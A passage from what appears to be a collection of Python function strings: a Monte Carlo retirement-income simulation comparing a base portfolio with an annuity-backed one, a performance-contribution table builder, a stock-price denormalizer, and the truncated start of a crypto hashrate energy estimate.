base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = income_needed + social\n\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - \\\n base_df.loc[counter, 'adv_fees'] - \\\n base_df.loc[counter, 'income']\n\n base_df.loc[counter, 'total_pre_income'] = base_df.loc[counter, 'total'] - \\\n base_df.loc[counter, 'adv_fees']\n\n base_investment = base_df.loc[counter, 'total_net_fees']\n\n base_df.loc[:, 'adj_total'] = base_df.loc[:, 'total_net_fees'].apply(lambda x: x if x > 0 else 0)\n sim_base_total.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_net_fees']\n sim_base_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'income']\n sim_base_total_pre_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_pre_income']\n\n # ----------------------------FIA PORTFOLIO----------------------------------------------\n for name in boy_value:\n fia_portfolio_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment\n for c in range(len(boy_value))]\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total_net_fees'] = 0.0\n fia_portfolio_df.loc[counter, 'income'] = 0.0\n port_investment = fia_portfolio_df.loc[counter, boy_value].sum()\n\n elif (counter > 0) and (counter < income_starts):\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees'] + cpn_income_port\n\n else:\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = income_needed + social\n\n if income:\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees'] - \\\n fia_portfolio_df.loc[counter, 'income']\n else:\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees'] + \\\n income_from_fia\n\n fia_portfolio_df.loc[counter, 'total_pre_income'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees']\n\n sim_port_total.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_net_fees'] + \\\n income_df.loc[:, 'contract_value']\n\n sim_port_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'income']\n\n fia_portfolio_df.loc[:, 'adj_total'] = fia_portfolio_df.loc[:, 'total_net_fees'].apply(\n lambda x: x if x > 0 else 0)\n\n sim_port_total_pre_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_pre_income']\n\n runs += 1\n\n # ------------------Calculate % of portfolios ending value greater than required LIFETIME cumm. income---------\n total_income_by_age = sim_base_income.loc[:, sim_base_income.columns[0]].cumsum()\n total_income_by_acturial_age = total_income_by_age.loc[life_expectancy - clients_age]\n total_income_by_age.fillna(0, inplace=True)\n income_dataframe = pd.DataFrame(total_income_by_age)\n income_dataframe.loc[:, 'remaining_income_by_acturial_age'] = total_income_by_age.apply(\n lambda x: total_income_by_acturial_age - x)\n\n s = income_dataframe.loc[:, 'remaining_income_by_acturial_age']\n base_prob_of_success = sim_base_total.gt(s, axis=0).sum(axis=1)\n port_prob_of_success = sim_port_total.gt(s, axis=0).sum(axis=1)\n\n # ----------------------------Portfolio sufficient for NEXT YEARS income needs-------------------\n next_year_income = sim_base_income.loc[:, sim_base_income.columns[0]].shift(-1).fillna(0) # Yearly Income Reqd.\n base_success_next_year = sim_base_total.gt(next_year_income, axis=0).sum(axis=1)\n\n base_for_next_year_need = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n\n port_success_next_year = sim_port_total.gt(next_year_income, axis=0).sum(axis=1)\n\n port_for_next_year_need = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ---------------Portfolio for 45 years of simulation---------------------------------------\n base_success_portfolio = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n port_success_portfolio = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ----------------Portfolio Simulation until the acturial age------------------------------\n acturial_years = life_expectancy - clients_age\n base_success_portfolio_act_age = base_success_portfolio.loc[acturial_years, :]\n port_success_portfolio_act_age = port_success_portfolio.loc[acturial_years, :]\n\n # -------------------------Base Portfolio TS with max Terminal Value ----------------------------\n if base_success_portfolio_act_age.isnull().sum() == trials:\n base_max_portfolio = 0.0\n else:\n base_max_portfolio = base_success_portfolio.loc[:, base_success_portfolio_act_age.idxmax()]\n\n # -------------------------FIA Portfolio TS with max Terminal Value ----------------------------\n if port_success_portfolio_act_age.isnull().sum() == trials:\n port_max_portfolio = 0.0\n else:\n port_max_portfolio = port_success_portfolio.loc[:, port_success_portfolio_act_age.idxmax()]\n # ------------------------------Average age with full income------------------------------\n base_mean_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n port_mean_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n # ----------------------------Median Age with full Income------------------------------------------\n base_median_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n port_median_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n # --------------Mean Value for all the portfolios at end of the acturial age--------------------\n base_act_avg_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n port_act_avg_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n\n # --------------Median Value for all the portfolios at end of the acturial age--------------------\n base_act_median_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n port_act_median_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n\n # # --------------Mean Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n #\n # # --------------Median Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n\n # -------Max Portfolio value at the end of acturial age----------------------------------------\n base_act_max = base_success_portfolio.loc[life_expectancy - clients_age, :].max()\n port_act_max = port_success_portfolio.loc[life_expectancy - clients_age, :].max()\n\n # -------Min Portfolio value at the end of acturial age----------------------------------------\n base_act_min = base_success_portfolio.loc[life_expectancy - clients_age, :].min()\n port_act_min = port_success_portfolio.loc[life_expectancy - clients_age, :].min()\n\n # ---------------------Lifetime Average Income----------------------------------\n base_total_income = sim_base_income.cumsum().loc[acturial_years, :].mean()\n port_total_income = income_from_fia + sim_port_income\n port_total_income = port_total_income.cumsum().loc[acturial_years, :].mean()\n\n simulation_stats = pd.DataFrame(index=['Average Years', 'Median Years', 'Average Age', 'Median Age',\n 'Average Portfolio (act.age)', 'Median Portfolio (act.age)',\n 'Max Portfolio Value', 'Min Portfolio Value',\n 'Average Lifetime Income'], columns=['Base', 'FIA'])\n\n simulation_stats.loc['Average Years', :] = [base_mean_age, base_mean_age]\n simulation_stats.loc['Median Years', :] = [base_median_age, base_median_age]\n simulation_stats.loc['Average Age', :] = [base_mean_age + clients_age, base_mean_age + clients_age]\n simulation_stats.loc['Median Age', :] = [base_median_age + clients_age, base_median_age + clients_age]\n simulation_stats.loc['Average Portfolio (act.age)', :] = [base_act_avg_porfolio, port_act_avg_porfolio]\n simulation_stats.loc['Median Portfolio (act.age)', :] = [base_act_median_porfolio, port_act_median_porfolio]\n simulation_stats.loc['Max Portfolio Value', :] = [base_act_max, port_act_max]\n simulation_stats.loc['Min Portfolio Value', :] = [base_act_min, port_act_min]\n simulation_stats.loc['Average Lifetime Income', :] = [base_total_income, port_total_income]\n comments = ['Average years of portfolios that meet the next years income needs for the lifetime',\n 'Median years of portfolios that meet the next years income needs for the lifetime',\n 'Average Clients Age',\n 'Median Clients Age',\n 'Average of terminal values for the portfolios at the end of the acturial life',\n 'Median of terminal values for the portfolios at the end of the acturial life',\n 'Maximum of terminal values for the portfolios at the end of the acturial life',\n 'Minimum of terminal values for the portfolios at the end of the acturial life',\n 'Average of total income generated by all portfolios at the end of the acturial life']\n\n simulation_stats.loc[:, 'Notes'] = comments\n\n # --------------------------------------------------------------------------------\n\n # # -----------------------------------income breakdown for Base portfolio----------------------------------\n # base_df.to_csv(src + 'base_port_detail.csv')\n # sim_base_total.to_csv(src + 'base_ending_values.csv')\n # income_breakdown_base = pd.DataFrame(sim_base_total.quantile(0.5, axis=1))\n # income_breakdown_base.loc[:, 'income_from_portfolio'] = sim_base_income.quantile(0.5, axis=1)\n # income_breakdown_base.loc[:, 'fia_income'] = 0.0\n # income_breakdown_base.loc[:, 'social_security_income'] = social\n # income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n #\n # income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # income_breakdown_base.loc[:, 'income_from_portfolio'][\n # income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n # axis=1)\n #\n # # --------------------------------------Block Ends-----------------------------------------------------------\n #\n # # ---------------------------------------income breakdown for FIA portfolio----------------------------------\n # fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n # sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n #\n # income_breakdown_port = pd.DataFrame(sim_port_total.quantile(0.5, axis=1))\n # income_breakdown_port.loc[:, 'income_from_portfolio'] = sim_port_income.quantile(0.5, axis=1)\n # income_breakdown_port.loc[:, 'fia_income'] = income_from_fia\n # income_breakdown_port.loc[:, 'social_security_income'] = social\n # income_breakdown_port.loc[:, 'coupon_income'] = cpn_income_port\n #\n # income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # income_breakdown_port.loc[:, 'income_from_portfolio'][\n # income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n # axis=1)\n #\n # # ----------------------------------Block Ends-------------------------------------------------------------\n q_cut = [0.0, 0.05, 0.25, 0.5, 0.75, 0.95, 1.0]\n sim_base_income[sim_base_total < income_needed] = 0.0\n\n sim_port_income[sim_port_total < income_net_fia_income] = 0\n\n sim_port_income = sim_port_income + income_from_fia\n\n # base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n #\n # port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n\n base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile(q_cut)\n\n port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile(q_cut)\n\n # q_cut = [0.0, .05, 0.25, 0.5, 0.75, 0.95, 1.0]\n cols = ['Min', '5th', '25th', '50th', '75th', '90th', 'Max']\n\n # ------------------------------------------drop year 0-----------------------------------------\n sim_base_total = sim_base_total[1:]\n sim_port_total = sim_port_total[1:]\n\n # ------------------------quantile analysis for base terminal value-----------------------------\n base_qcut = pd.DataFrame(index=sim_base_total.index, columns=cols)\n for c in range(len(cols)):\n base_qcut.loc[:, cols[c]] = sim_base_total.quantile(q_cut[c], axis=1)\n\n base_qcut.clip(lower=0, inplace=True)\n\n sim_base_total.clip(lower=0, inplace=True)\n\n # -------------------------------------quantile analysis for base income----------------------------\n base_income_qcut = pd.DataFrame(index=sim_base_income.index, columns=cols)\n for c in range(len(cols)):\n base_income_qcut.loc[:, cols[c]] = sim_base_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # base_income_qcut = base_income_qcut.loc[income_starts:]\n\n # ---------------------------------quantile analysis for portfolio terminal value ---------------\n\n port_qcut = pd.DataFrame(index=sim_port_total.index, columns=cols)\n for c in range(len(cols)):\n port_qcut.loc[:, cols[c]] = sim_port_total.quantile(q_cut[c], axis=1)\n\n port_qcut.clip(lower=0, inplace=True)\n\n # ----------------------------------quantile analysis for portfolio income----------------------------\n port_income_qcut = pd.DataFrame(index=sim_port_income.index, columns=cols)\n for c in range(len(cols)):\n port_income_qcut.loc[:, cols[c]] = sim_port_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # port_income_qcut = port_income_qcut.loc[income_starts:]\n\n # ----------probability ending value will be less than 0 at the end of the horizon -----------------------\n # base_legacy_risk = (sim_base_total.loc[sim_base_total.index[-1]] < 0).sum() / (trials)\n\n base_legacy_risk = (sim_base_total.loc[sim_base_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n port_legacy_risk = (sim_port_total.loc[sim_port_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n\n # port_legacy_risk = (sim_port_total.loc[sim_port_total.index[-1]] <= 0).sum() / (trials)\n\n legacy_risk = pd.DataFrame([base_legacy_risk, port_legacy_risk,\n 'Prob. of portfolio value less than 0 at the end of the expected life'],\n index=['base', 'fia_portfolio', 'Notes'],\n columns=['Ruin Probability'])\n\n # -----------Year-wise probability of ending value greater than 0 -----------------\n base_psuccess = sim_base_total.apply(lambda x: x > 0).sum(axis=1) / trials\n port_psuccess = sim_port_total.apply(lambda x: x > 0).sum(axis=1) / trials\n\n # -----------------------WRITING FILES TO EXCEL ---------------------------\n\n writer = pd.ExcelWriter(src + method + '_simulated_income_summary_custom.xlsx', engine='xlsxwriter')\n read_income_inputs.to_excel(writer, sheet_name='inputs_for_income')\n\n read_returns_est.to_excel(writer, sheet_name='asset_returns_estimates')\n # read_portfolio_inputs.to_excel(writer, sheet_name='portfolio_inputs')\n\n age_index = list(range(clients_age + 1, clients_age + len(base_qcut) + 1))\n # base_qcut.loc[:, 'clients_age'] = age_index\n # base_qcut.loc[:, 'comment'] = ''\n # base_qcut.loc[:, 'comment'] = np.where(base_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n base_inv = float(read_income_inputs.loc['risky_assets', 'Base'])\n base_qcut.loc[:, 'age'] = age_index\n base_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n\n # --------To start with year 0---------------------------------\n insert_col = [base_inv, base_inv, base_inv, base_inv, base_inv, base_inv,\n base_inv, clients_age, np.nan]\n base_qcut.loc[len(base_qcut) + 1, :] = 0.0\n base_qcut = base_qcut.shift(1)\n base_qcut.iloc[0] = insert_col\n base_qcut.reset_index(drop=True, inplace=True)\n base_qcut.loc[:, 'Annual Return'] = base_qcut.loc[:, '50th'].pct_change().fillna(0)\n base_qcut.to_excel(writer, sheet_name='base_ending_value_quantiles')\n # base_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_ending_value_quantiles')\n\n # base_income_qcut = base_income_qcut[1:] base_income_qcut.loc[:, 'clients_age'] = age_index\n # base_income_qcut.loc[:, 'comment'] = '' base_income_qcut.loc[:, 'comment'] = np.where(\n # base_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n base_income_qcut = base_income_qcut.loc[1:, :]\n base_income_qcut.loc[:, 'age'] = age_index\n base_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n\n base_income_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_quantiles')\n\n # age_index = list(range(clients_age+1, clients_age + len(port_qcut)+1))\n # port_qcut.loc[:, 'clients_age'] = age_index\n # port_qcut.loc[:, 'comment'] = ''\n # port_qcut.loc[:, 'comment'] = np.where(port_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_qcut.loc[:, 'age'] = age_index\n port_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_qcut.loc[len(port_qcut) + 1, :] = 0.0\n port_qcut = port_qcut.shift(1)\n port_qcut.iloc[0] = insert_col\n port_qcut.reset_index(drop=True, inplace=True)\n port_qcut.loc[:, 'Annual Return'] = port_qcut.loc[:, '50th'].pct_change().fillna(0)\n port_qcut.to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n # port_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n\n # port_income_qcut = port_income_qcut[1:] port_income_qcut.loc[:, 'clients_age'] = age_index\n # port_income_qcut.loc[:, 'comment'] = '' port_income_qcut.loc[:, 'comment'] = np.where(\n # port_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_income_qcut = port_income_qcut.loc[1:, :]\n port_income_qcut.loc[:, 'age'] = age_index\n port_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_income_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='fia_port_income_quantiles')\n\n prob_success_df = pd.concat([base_psuccess, port_psuccess], axis=1)\n prob_success_df.rename(columns={prob_success_df.columns[0]: 'prob(ending_value>0)_base',\n prob_success_df.columns[1]: 'prob(ending_value>0)_port'}, inplace=True)\n\n # prob_success_df.loc[:, 'clients_age'] = age_index\n # prob_success_df.loc[:, 'comment'] = ''\n # prob_success_df.loc[:, 'comment'] = np.where(prob_success_df.clients_age == life_expectancy, 'expected_life', \"\")\n\n prob_success_df.loc[:, 'age'] = age_index\n prob_success_df.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_base'] = base_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_port'] = port_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_base'] = base_success_next_year / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_port'] = port_success_next_year / trials\n prob_success_df.loc[:, 'base_max_portfolio_at_acturial_age'] = base_max_portfolio\n prob_success_df.loc[:, 'port_max_portfolio_at_acturial_age'] = port_max_portfolio\n\n # --------------------Percentile Portfolio's based on Acturial Life------------------------\n base_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_base']\n port_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_port']\n\n # acturial_age_base_tv = sim_base_total.loc[:life_expectancy - clients_age, ]\n # percentile_base_tv = sim_base_total.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_base = base_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = base_for_next_year_need.copy().fillna(0)\n percentile_base = base_for_next_year_need.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # acturial_age_port_tv = sim_port_total.loc[:life_expectancy - clients_age, ]\n # percentile_port_tv = sim_port_total.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_port = port_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = port_for_next_year_need.copy().fillna(0)\n percentile_port = port_for_next_year_need.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n prob_success_df.loc[:, 'acturial_success_percentile_base_portfolio'] = percentile_base\n prob_success_df.loc[:, 'acturial_success_percentile_port_portfolio'] = percentile_port\n\n # prob_success_df.loc[:, 'terminalVal_success_percentile_base_portfolio'] = percentile_base_tv\n # prob_success_df.loc[:, 'terminalVal_success_percentile_port_portfolio'] = percentile_port_tv\n\n prob_success_df.to_excel(writer, sheet_name='success_probability')\n\n # --------------BASE - Accumulation and Income Breakdown based on the success percentile portfolio---------------\n base_df.to_csv(src + 'base_port_detail.csv')\n sim_base_total.to_csv(src + 'base_ending_values.csv')\n income_breakdown_base = pd.DataFrame(sim_base_total.quantile(base_success, axis=1))\n income_breakdown_base.loc[:, 'income_from_risky_assets'] = sim_base_income.quantile(base_success, axis=1) \\\n - social - cpn_income_port\n income_breakdown_base.loc[:, 'guaranteed_income'] = 0.0\n income_breakdown_base.loc[:, 'social_security_income'] = social\n income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n\n income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_base.loc[:, 'income_from_risky_assets'][\n income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n axis=1)\n\n # ----------FIA PORTFOLIO - Accumulation and Income Breakdown based on the success percentile portfolio-----------\n fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n\n income_breakdown_port = pd.DataFrame(sim_port_total.quantile(port_success, axis=1))\n income_breakdown_port.loc[:, 'income_from_risky_assets'] = sim_port_income.quantile(port_success, axis=1) \\\n - income_from_fia - social - cpn_income_port\n income_breakdown_port.loc[:, 'guaranteed_income'] = income_from_fia\n income_breakdown_port.loc[:, 'social_security_income'] = social\n income_breakdown_port.loc[:, 'coupon_income'] = cpn_income_port\n\n income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_port.loc[:, 'income_from_risky_assets'][\n income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n axis=1)\n\n # -------------------Write simulation Statistics-------------------------------------\n simulation_stats.to_excel(writer, sheet_name='simulation_statistics')\n\n # port_psuccess.to_excel(writer, sheet_name='fia_port_success_probability')\n\n income_breakdown_base = income_breakdown_base.loc[1:, :]\n income_breakdown_base.loc[:, 'age'] = age_index\n income_breakdown_base.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_base.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_breakdown_median')\n\n income_breakdown_port = income_breakdown_port.loc[1:, :]\n income_breakdown_port.loc[:, 'age'] = age_index\n income_breakdown_port.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_port.loc[income_starts:, :].to_excel(writer, sheet_name='fia_income_breakdown_median')\n\n legacy_risk.to_excel(writer, sheet_name='ruin_probability')\n\n median_returns_normal.loc[:, 'fia_median_returns'] = median_normal_fia\n median_returns_normal.to_excel(writer, sheet_name='gr_port_median_normal')\n\n writer.save()\n\n # -----------------Plotting charts--------------------------------------------\n base_qcut.loc[income_starts:].plot(grid=True, title='Quantile Terminal Value - Base Portfolio')\n plt.savefig(src + \"quantile_terminal_base.png\")\n plt.close('all')\n\n base_income_qcut.plot(grid=True, title='Quantile Income - Base Portfolio')\n plt.savefig(src + \"quantile_income_base.png\")\n plt.close('all')\n\n base_psuccess.plot(grid=True, title='Probability of Success (Portfolio Ending Value > 0) - Base Portfolio')\n plt.savefig(src + \"success_probabilty_base.png\")\n plt.close('all')\n\n (1 - base_psuccess).plot(grid=True, title='Probability of Ruin (Portfolio Ending Value < 0) - Base Portfolio')\n plt.savefig(src + \"ruin_probability_base.png\")\n plt.close('all')\n\n port_qcut.loc[income_starts:].plot(grid=True, title='Quantile Terminal Value - FIA Portfolio')\n plt.savefig(src + \"quantile_terminal_fia.png\")\n plt.close('all')\n\n port_income_qcut.plot(grid=True, title='Quantile Income - FIA Portfolio')\n plt.savefig(src + \"quantile_income_fia.png\")\n plt.close('all')\n\n port_psuccess.plot(grid=True, title='Probability of Success (Portfolio Ending Value > 0) - FIA Portfolio')\n plt.savefig(src + \"success_probabilty_fia.png\")\n plt.close('all')\n\n (1 - port_psuccess).plot(grid=True, title='Probability of Ruin (Portfolio Ending Value < 0) - FIA Portfolio')\n plt.savefig(src + \"ruin_probability_fia.png\")\n plt.close('all')\n\n print(\"simulation completed....\")", "def _create_performance_contribution_tables(self, performance_df: QFDataFrame) -> List[DFTable]:\n # Create a QFSeries which contains the initial amount of cash in the portfolio for each year / month\n numeric_columns = [col for col in performance_df.columns if is_numeric_dtype(performance_df[col])]\n portfolio_values = performance_df[numeric_columns].sum().shift(fill_value=self._initial_cash).cumsum()\n performance_df[numeric_columns] = performance_df[numeric_columns] / portfolio_values[numeric_columns]\n\n # Add category column and aggregate data accordingly\n ticker_name_to_category = {t.name: category for t, category in self._ticker_to_category.items()}\n performance_df[\"Category\"] = performance_df[\"Asset\"].apply(lambda t: ticker_name_to_category[t])\n all_categories = list(set(ticker_name_to_category.values()))\n performance_df = performance_df.sort_values(by=[\"Category\", \"Asset\"])\n performance_df = performance_df.groupby(\"Category\").apply(\n lambda d: pd.concat([PricesDataFrame({**{\"Asset\": [d.name], \"Category\": [d.name]},\n **{c: [d[c].sum()] for c in numeric_columns}}), d],\n ignore_index=True)).drop(columns=[\"Category\"])\n\n # Add the Total Performance row (divide by 2 as the df contains already aggregated data for each group)\n total_sum_row = performance_df[numeric_columns].sum() / 2\n total_sum_row[\"Asset\"] = \"Total Performance\"\n performance_df = performance_df.append(total_sum_row, ignore_index=True)\n\n # Format the rows using the percentage formatter\n performance_df[numeric_columns] = performance_df[numeric_columns].applymap(lambda x: '{:.2%}'.format(x))\n\n # Divide the performance dataframe into a number of dataframes, so that each of them contains up to\n # self._max_columns_per_page columns\n split_dfs = np.array_split(performance_df.set_index(\"Asset\"),\n np.ceil((performance_df.num_of_columns - 1) / self._max_columns_per_page), axis=1)\n df_tables = [DFTable(df.reset_index(), css_classes=['table', 'shrink-font', 'right-align', 'wide-first-column'])\n for df in split_dfs]\n\n # Get the indices of rows, which contain category info\n category_indices = performance_df[performance_df[\"Asset\"].isin(all_categories)].index\n\n for df_table in df_tables:\n # Add table formatting, highlight rows showing the total contribution of the given category\n df_table.add_rows_styles(category_indices, {\"font-weight\": \"bold\", \"font-size\": \"0.95em\",\n \"background-color\": \"#cbd0d2\"})\n df_table.add_rows_styles([performance_df.index[-1]], {\"font-weight\": \"bold\", \"font-size\": \"0.95em\",\n \"background-color\": \"#b9bcbd\"})\n return df_tables", "def denormalize(stock_name, normalized_value,split=0.7,predict=True):\n df = xl.parse(stock_name)\n #df.drop(['VOLUME'], 1, inplace=True)\n df.set_index('Date', inplace=True)\n \n # Renaming all the columns so that we can use the old version code\n df.rename(columns={'OPEN': 'Open', 'HIGH': 'High', 'LOW': 'Low', 'NUMBER_TICKS': 'Volume', 'LAST_PRICE': 'Adj Close'}, inplace=True)\n\n\n df.dropna(inplace=True)\n df = df['Adj Close'].values.reshape(-1,1)\n normalized_value = normalized_value.reshape(-1,1)\n \n row = round(split * df.shape[0]) \n if predict:\n df_p=df[0:row].copy()\n else:\n df_p=df[row:len(df)].copy()\n \n #return df.shape, p.shape\n max_df=np.max(df_p)\n min_df=np.min(df_p)\n new=normalized_value*(max_df-min_df)+min_df\n \n return new", "def consumptionFromHashrate(data_df, eff: float=0.02, same_hr: bool=False, verbose: bool=VERBOSE):\n count = 0\n year_ends = []\n years = [str(year) for year in range(2016,2050,1)]\n for y in years:\n if int(y) % 4 == 0:\n count += 366\n else:\n count += 365\n\n year_ends.append(count)\n\n hr_race_df = pd.DataFrame(columns=data_df.columns)\n hr_race_df[\"date\"] = years\n\n # computing hashrate prediction via regression for each crypto (i.e. each column)\n print(f\"\\n[INFO]: Computing crypto energy consumption from hashrate (using efficiency {eff:0.2f}) ...\\n\")\n for crypto in data_df.columns[1:]:\n print(f\"Analyzing hashrate of {crypto} ...\")\n 